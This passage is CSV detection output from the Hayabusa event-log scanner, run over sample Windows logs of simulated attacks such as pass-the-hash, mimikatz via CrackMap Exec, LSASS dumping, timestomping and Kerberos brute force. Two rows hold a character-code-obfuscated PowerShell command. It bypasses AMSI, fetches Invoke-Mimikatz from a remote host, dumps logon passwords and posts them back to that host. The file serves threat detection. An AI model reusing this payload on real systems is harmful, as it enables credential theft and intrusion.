+09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 
510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.635 
+09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 
,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 
101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 
,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 
,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | 
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time 
changed.evtx +2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded 
(CME+Mimikatz).evtx +2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:test1/rey/b aer/sgfg/g/tbyt/ysy/admtest/wyt/vase/ytuntsr/mgdi/syvsdy/s/vt/test2/ugu/sef/gsdf/yvas/accrt/tc/dyfgdhbn/bsfin/ar/xvtrz/vs/uydzry/vay/yvsyv/tary/go/xt/nini/bdcy/xc/sfs/srey/m,og/vdr/tfay/nd/vga/vrat/rec/ryver IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- +2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 